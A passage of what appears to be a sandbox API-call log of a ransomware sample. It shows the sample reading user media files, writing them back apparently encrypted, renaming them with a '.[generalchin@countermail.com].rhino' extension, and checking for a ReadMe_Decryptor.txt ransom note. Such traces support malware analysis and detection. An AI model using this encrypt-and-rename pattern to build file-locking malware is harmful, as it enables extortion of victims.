hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760fd0 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x75f208 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762510 | out: hHeap=0x6d0000) returned 1 [0085.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x7621a0 [0085.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0085.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x71c2e8 [0085.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7621a0 | out: hHeap=0x6d0000) returned 1 [0085.865] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75f208 [0085.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c2e8 | out: hHeap=0x6d0000) returned 1 [0085.866] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0085.867] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0085.867] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0085.870] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0085.870] WriteFile (in: hFile=0xec, lpBuffer=0x781f80*, nNumberOfBytesToWrite=0x11d8d, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x781f80*, lpNumberOfBytesWritten=0x2cfa04*=0x11d8d, lpOverlapped=0x0) returned 1 [0085.871] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0085.871] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11d8d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0085.871] CloseHandle (hObject=0xec) returned 1 [0085.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x75ef78 [0085.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75f208 [0085.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.873] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6V7X.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6v7x.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6V7X.flv.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6v7x.flv.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0085.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0085.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0085.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0085.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0085.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0085.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9iCmi1wS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9icmi1ws.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0085.875] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x5b10 [0085.875] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5c30, nNumberOfBytesToLockHigh=0x0) returned 1 [0085.875] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.875] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0085.876] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.877] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x5b10, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x5b10, lpOverlapped=0x0) returned 1 [0085.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0085.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0085.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0085.877] GetLastError () returned 0x0 [0085.878] SetLastError (dwErrCode=0x0) [0085.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5b33) returned 0x75ef78 [0085.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x764ab8 [0085.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x764bc0 [0085.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764ab8 | out: hHeap=0x6d0000) returned 1 [0085.878] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0085.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0085.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0085.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0085.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0085.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x764ab8 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x764d48 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764ab8 | out: hHeap=0x6d0000) returned 1 [0085.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x764e28 [0085.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764d48 | out: hHeap=0x6d0000) returned 1 [0085.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x764f70 [0085.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764e28 | out: hHeap=0x6d0000) returned 1 [0085.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x765158 [0085.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764f70 | out: hHeap=0x6d0000) returned 1 [0085.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x765428 [0085.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765158 | out: hHeap=0x6d0000) returned 1 [0085.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x764d48 [0085.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765428 | out: hHeap=0x6d0000) returned 1 [0085.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x765390 [0085.884] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764d48 | out: hHeap=0x6d0000) returned 1 [0085.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x765cf8 [0085.884] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765390 | out: hHeap=0x6d0000) returned 1 [0085.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x766b10 [0085.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765cf8 | out: hHeap=0x6d0000) returned 1 [0085.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x768050 [0085.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x766b10 | out: hHeap=0x6d0000) returned 1 [0085.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x764d48 [0085.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768050 | out: hHeap=0x6d0000) returned 1 [0085.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x72bfe8 [0085.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764d48 | out: hHeap=0x6d0000) returned 1 [0085.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x764d48 [0085.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0085.886] WriteFile (in: hFile=0xec, lpBuffer=0x764d60*, nNumberOfBytesToWrite=0x5c30, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x764d60*, lpNumberOfBytesWritten=0x2cfa04*=0x5c30, lpOverlapped=0x0) returned 1 [0085.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764d48 | out: hHeap=0x6d0000) returned 1 [0085.887] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5c30, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0085.887] CloseHandle (hObject=0xec) returned 1 [0085.889] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0085.889] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x764ab8 [0085.889] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.889] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9iCmi1wS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9icmi1ws.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9iCmi1wS.m4a.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9icmi1ws.m4a.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0085.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764ab8 | out: hHeap=0x6d0000) returned 1 [0085.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764bc0 | out: hHeap=0x6d0000) returned 1 [0085.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0085.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0085.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9kbs2_w18IOb i9.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9kbs2_w18iob i9.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0085.891] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xf0e6 [0085.891] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf206, nNumberOfBytesToLockHigh=0x0) returned 1 [0085.891] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.891] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0085.893] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.893] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xf0e6, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xf0e6, lpOverlapped=0x0) returned 1 [0085.894] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0085.894] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.894] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0085.894] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0085.894] GetLastError () returned 0x0 [0085.894] SetLastError (dwErrCode=0x0) [0085.894] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.894] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf109) returned 0x72bfe8 [0085.984] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.984] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x73b100 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x73b208 [0085.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b100 | out: hHeap=0x6d0000) returned 1 [0085.985] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0085.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0085.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0085.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0085.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0085.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0085.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0085.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0085.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x73b100 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x73b390 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b100 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x73b470 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b390 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x73b5b8 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b470 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x73b7a0 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b5b8 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x73ba70 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b7a0 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x73b390 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73ba70 | out: hHeap=0x6d0000) returned 1 [0085.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75ef78 [0085.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b390 | out: hHeap=0x6d0000) returned 1 [0085.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75f8e0 [0085.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7606f8 [0085.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f8e0 | out: hHeap=0x6d0000) returned 1 [0085.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x761c38 [0085.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7606f8 | out: hHeap=0x6d0000) returned 1 [0085.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763c00 [0085.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761c38 | out: hHeap=0x6d0000) returned 1 [0085.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x75ef78 [0085.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763c00 | out: hHeap=0x6d0000) returned 1 [0085.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7636c8 [0085.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x74c388 [0085.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7636c8 | out: hHeap=0x6d0000) returned 1 [0085.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0085.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c388 | out: hHeap=0x6d0000) returned 1 [0085.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0085.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0085.993] WriteFile (in: hFile=0xec, lpBuffer=0x70a660*, nNumberOfBytesToWrite=0xf206, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x70a660*, lpNumberOfBytesWritten=0x2cfa04*=0xf206, lpOverlapped=0x0) returned 1 [0085.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0085.994] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf206, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0085.994] CloseHandle (hObject=0xec) returned 1 [0085.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x73b100 [0085.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x73b390 [0085.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b100 | out: hHeap=0x6d0000) returned 1 [0085.995] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9kbs2_w18IOb i9.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9kbs2_w18iob i9.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9kbs2_w18IOb i9.pps.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9kbs2_w18iob i9.pps.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0085.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b390 | out: hHeap=0x6d0000) returned 1 [0085.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b208 | out: hHeap=0x6d0000) returned 1 [0085.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0085.996] 